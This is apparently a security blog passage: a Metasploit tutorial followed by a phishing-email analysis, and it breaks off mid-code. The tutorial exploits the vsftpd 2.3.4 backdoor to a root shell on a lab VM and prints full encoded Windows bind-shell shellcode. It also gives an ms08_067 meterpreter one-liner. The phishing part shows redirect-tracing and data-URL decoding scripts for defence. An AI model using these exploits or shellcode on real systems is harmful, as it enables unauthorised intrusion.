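    ("vsftpd", "2.3.4"): "exploit/unix/ftp/vsftpd_234_backdoor",
}


def parse_banner(banner):
    """Return (product, version) if the banner matches a known pattern, else None."""
    for product, rx in BANNER_PATTERNS:
        m = rx.search(banner)
        if m:
            return product, m.group("ver")
    return None


def grab_banner(host, port, timeout=1.0):
    """TCP connect scan of one port plus a banner grab: FTP, SSH and SMTP all talk
    first, so a single recv() after connecting gives the version string.
    Returns (is_open, banner_text)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(256)
            except OSError:          # open port but silent service (e.g. HTTP)
                data = b""
            return True, data.decode("latin-1").strip()
    except OSError:                   # refused, filtered or timed out
        return False, ""


def scan(host, ports):
    """Return {port: {"banner", "service", "module"}} for every open port."""
    results = {}
    for port in ports:
        is_open, banner = grab_banner(host, port)
        if not is_open:
            continue
        service = parse_banner(banner)
        results[port] = {
            "banner": banner,
            "service": service,
            "module": KNOWN_VULNERABLE.get(service) if service else None,
        }
    return results


def fake_service(banner):
    """Throwaway loopback listener that greets each client with `banner`; it stands in
    for the Metasploitable VM so the example runs offline. Returns the port number."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def unused_port():
    """A loopback port that nothing listens on, to show a closed port in the scan."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    ftp = fake_service(b"220 (vsFTPd 2.3.4)\r\n")
    ssh = fake_service(b"SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n")
    for port, info in scan("127.0.0.1", [ftp, ssh, unused_port()]).items():
        print(port, info["service"], info["module"] or "no known exploit")
```

Against a real host the connect scan is as noisy as Metasploit’s portscan/tcp (every port gets a full handshake), and services that wait for the client to speak first, such as HTTP, come back with an empty banner; for those you would send a request before reading.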

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.63.156   yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

There’s only one payload we can use with this exploit, cmd/unix/interact, which means we interact with the shell directly after exploitation.

Now we succeed (and the UID line shows the shell runs as root):

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases we may need custom payloads, as I did for a Secure Programming class in 2014.

Pick a payload and generate its shellcode (using payload/windows/shell_bind_tcp as the example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

To keep specific bytes out of the shellcode (take \x00 as an example), list them as bad characters:

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"

So we get a payload without \x00, which is somewhat longer than the previous one because the encoder’s decoder stub is prepended.
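Before an encoded payload goes into an exploit you want to confirm two things: that the bytes really avoid the characters you listed, and how much bigger the encoder made it. The following Python is an added example, not part of the original post or of Metasploit. It parses the Ruby-style buf listing that generate prints (quoted hex escapes joined with +), reports the length and every bad-character hit, and emits the bytes as a C array for a test harness. The listing it parses is a constructed 12-byte stub in the same format, not the payload above.

```python
import re

# Matches one quoted chunk of the Ruby listing, e.g. "\xfc\xe8\x82\x00"
CHUNK_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
BYTE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_msf_buf(text):
    """Turn the quoted hex-escape listing printed by msf's `generate` into bytes.
    Comment lines and the `buf =` line carry no quotes and fall through."""
    data = bytearray()
    for chunk in CHUNK_RE.findall(text):
        data.extend(int(h, 16) for h in BYTE_RE.findall(chunk))
    return bytes(data)


def find_bad_chars(data, bad):
    """Every (offset, byte) where a byte from `bad` occurs; empty list means clean."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def to_c_array(data, name="shellcode", per_line=12):
    """Render the bytes as a C array, the form an exploit stub would include."""
    rows = []
    for i in range(0, len(data), per_line):
        rows.append("    " + ", ".join(f"0x{b:02x}" for b in data[i:i + per_line]) + ",")
    return f"unsigned char {name}[{len(data)}] = {{\n" + "\n".join(rows) + "\n}};"


def check_payload(text, bad=(0x00,)):
    """Parse a generate listing and report its size and any bad-character hits."""
    data = parse_msf_buf(text)
    return {"length": len(data), "bad": find_bad_chars(data, set(bad))}


# Constructed 12-byte stub in the exact listing format, not a working payload.
RAW_LISTING = r'''# windows/shell_bind_tcp - 12 bytes
# http://www.metasploit.com
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89" +
"\xe5\x31\xc0\x64"
'''

if __name__ == "__main__":
    report = check_payload(RAW_LISTING)
    print(report)
    print(to_c_array(parse_msf_buf(RAW_LISTING)))
```

Run it on the first listing above and the \x00 bytes show up (starting at offsets 3, 4 and 5); on the shikata_ga_nai output the hit list is empty and the length grows from 328 to 355. The C array is only a transport: it says nothing about whether the stub decodes correctly on the target, which you still verify in a debugger.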

Then we can apply an encoder of our choice to the shellcode. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
   cmd/powershell_base64                          excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                              manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                                  manual     The EICAR Encoder
   … (dismiss)

Generate code with a chosen encoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"

or, with all the options together (bad characters to avoid, the encoder, and an output file):

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"

Scripting

The Metasploit framework lets users write scripts (resource files) to drive the console. There are three ways to run such a script:

  1. > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"  
    
  2. > msfconsole -r my_script.rc
    
  3. (in msfconsole)

    msf > resource my_script.rc
    

Database

When conducting a penetration test, it is frequently a challenge to keep track of everything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has built-in support for the PostgreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap, but the results are saved into the current database
  • db_import
  • db_export -f xml [filepath for xml]

Conclusion

Metasploit is a powerful tool that lets people launch attacks with the aid of its exploit database. Although this post only covers the basic usage of Metasploit with one example, which hardly shows its full strength, I will keep updating this post if I find anything new and worth sharing.

Friday, February 12, 2016

Phishing Email

I got an email today that looks like spam. However, Google didn't mark it as spam, which it usually does. So I took some notes on understanding this email.

Email

Instead of using super attractive words, the content said that I had to log in somewhere in order to get my mail back. However, I checked the sender's domain, "hawaiiantel.net", and I am sure that I've never used any service from them. More generally, we can't fully trust that nobody will send spam from domains that "look safe". That is, even if the mail comes from a domain we know, we still have to be careful.



External Link

Don't click on the link if we don't trust it at this point. Copy the link and read it in order to understand who is hosting it. What I got is "http://ow.ly/YeNWT", which looks like a shortened URL hiding the real URL. Legitimate senders rarely do this, since there's no benefit in this case; it's always better to use URLs under the company's own domain so that people can trust them.



So, instead of using my usual browser, which holds my cookies for many different websites, I used "Tor Browser" to keep myself safe.

Analyzing the Site - Routing


After seeing the page in Tor Browser, it's almost 100% sure that this is a phishing site. However, in order to understand it better, we can track how its URL redirection works using the following information:

> wget http://ow.ly/YeNWT
--2016-02-12 14:17:58--  http://ow.ly/YeNWT
Resolving ow.ly (ow.ly)... 54.67.120.65, 54.183.130.144, 54.183.131.91, ...
Connecting to ow.ly (ow.ly)|54.67.120.65|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://hannahreade.co.uk/WT/orin.htm [following]
--2016-02-12 14:17:59--  http://hannahreade.co.uk/WT/orin.htm
Resolving hannahreade.co.uk (hannahreade.co.uk)... 50.115.112.7
Connecting to hannahreade.co.uk (hannahreade.co.uk)|50.115.112.7|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 102999 (101K) [text/html]

By requesting "http://ow.ly/YeNWT", I was redirected to "http://hannahreade.co.uk/WT/orin.htm". "hannahreade.co.uk" looks like a normal website, and if so, the site may have been hacked.
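The wget run above resolves the shortened link by hand. The script below is an added example (not part of the original post) that does the same thing programmatically: it follows HTTP redirects with HEAD requests only, so no page body is downloaded, caps the number of hops, refuses loops, and reports every hop that crosses to a different host. The HTTP transport is injected as a function, so the example runs offline against a constructed stand-in that reproduces the ow.ly to hannahreade.co.uk hop from the wget output; the `live_head` helper and the `.test` hostnames are my own additions, not anything from the post.

```python
"""Resolve a shortened URL's redirect chain without downloading page bodies."""
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = (301, 302, 303, 307, 308)
MAX_HOPS = 10


def resolve_chain(url, fetch_head, max_hops=MAX_HOPS):
    """Follow redirects starting at `url` and return the list of URLs visited.

    `fetch_head(url)` must return (status_code, headers_dict) for a HEAD
    request. It is injected so the same logic works with a real client
    (`live_head`) or with the constructed offline stand-in (`fake_head`).
    Raises RuntimeError on a redirect loop, a missing Location header, or
    when `max_hops` is exceeded.
    """
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, headers = fetch_head(chain[-1])
        if status not in REDIRECT_CODES:
            return chain
        location = headers.get("Location")
        if location is None:
            raise RuntimeError(f"{status} without Location header at {chain[-1]}")
        nxt = urljoin(chain[-1], location)  # Location may be relative
        if nxt in seen:
            raise RuntimeError(f"redirect loop at {nxt}")
        seen.add(nxt)
        chain.append(nxt)
    raise RuntimeError(f"more than {max_hops} redirects starting at {url}")


def hostnames(chain):
    return [urlsplit(u).hostname for u in chain]


def domain_changes(chain):
    """Return (from_host, to_host) pairs for every hop that lands on another host."""
    hosts = hostnames(chain)
    return [(a, b) for a, b in zip(hosts, hosts[1:]) if a != b]


# Constructed stand-in for the HEAD responses; it mirrors the single hop
# shown in the wget output (ow.ly -> hannahreade.co.uk). No network is used.
CONSTRUCTED_RESPONSES = {
    "http://ow.ly/YeNWT": (301, {"Location": "http://hannahreade.co.uk/WT/orin.htm"}),
    "http://hannahreade.co.uk/WT/orin.htm": (200, {"Content-Type": "text/html"}),
}


def fake_head(url):
    return CONSTRUCTED_RESPONSES.get(url, (404, {}))


def live_head(url, timeout=10):
    """Real HEAD request with automatic redirect-following disabled (urllib only)."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # make urllib surface the 3xx instead of following it

    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers)
    except urllib.error.HTTPError as err:  # 3xx and 4xx/5xx both land here
        return err.code, dict(err.headers)


if __name__ == "__main__":
    chain = resolve_chain("http://ow.ly/YeNWT", fake_head)
    for hop in chain:
        print(hop)
    print("host changes:", domain_changes(chain))
```

To inspect a real link, pass `live_head` instead of `fake_head`; as the post notes, do that from an isolated environment rather than the browser profile that holds your session cookies, since even a HEAD request reveals your address to whoever hosts the final site.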

Analyzing the Site - Purpose

Like most phishing websites, the purpose of this site is to collect users' account names and passwords by imitating a real site. The site looks exactly like the Google login page; however, nothing is actually the same besides its layout. We can tell this simply by reading the URL, or by typing a wrong password and seeing what happens.

In this case, I could log in without typing a correct password. And their second page requested my cell phone number. Of course, I could go on to the next page by giving a random cell number (even one in a wrong phone number format). Then the site gave me a blank page after I had given all this information, which is what they usually do. Therefore, the user may just get confused and ignore this without thinking too much, while the account username and password have already been sent to the attacker.



Analyzing the Site - Code

That's pretty much it so far; however, it is still nice to go through their code a little bit. After I fetched the phishing site with "wget", I had the raw HTML file of the site. This is its second line:

<meta http-equiv="Refresh" content="1; url=data:text/html;base64, 77u/IA0KPC...

The page redirects to another URL, "data:text/html;base64, ....", which isn't a link to another site but a URL that carries the whole page inside itself as a base64 string. When the browser opens that URL, the string is decoded back into HTML.

However, part of that code was encoded JavaScript, which hides the further details.



To identify the attacker, we could decode everything on the site, or monitor the packets exchanged between my laptop and any external services. However, I am not going into this now, and may continue this work another day.
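The meta refresh above is the interesting part of the page, and the "77u/IA0K" that opens its base64 body is worth knowing: it decodes to the UTF-8 byte order mark followed by " \r\n", so the string is a real HTML document, not junk. The script below is an added example (not code from the post or from the phishing kit) that pulls the url= target out of every meta refresh tag, decodes a data: URL in place, strips the BOM, and summarises what the decoded page carries: script tags, password fields, and form actions. The sample page, the `collector.example` form target and the placeholder script body are constructed for the example and are not values from the original site.

```python
"""Decode a base64 data: URL hidden behind a meta refresh and summarise it."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# content="<seconds>; url=<target>"  (case-insensitive, target may be quoted)
META_REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*(.+)$", re.IGNORECASE | re.DOTALL)


class MetaRefreshFinder(HTMLParser):
    """Collect the url= part of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        m = META_REFRESH_RE.match(a.get("content", ""))
        if m:
            self.targets.append(m.group(1).strip().strip("'\""))


def find_meta_refresh_targets(html):
    parser = MetaRefreshFinder()
    parser.feed(html)
    return parser.targets


def decode_data_url(url):
    """Decode a data: URL into (media_type, raw_bytes); handles base64 and percent-encoded bodies."""
    if not url.lower().startswith("data:"):
        raise ValueError("not a data: URL")
    header, _, body = url[5:].partition(",")
    params = [p.strip() for p in header.split(";")]
    media_type = params[0] or "text/plain"
    if "base64" in (p.lower() for p in params[1:]):
        # The sample has a space after the comma; base64 ignores whitespace once removed.
        data = base64.b64decode("".join(body.split()))
    else:
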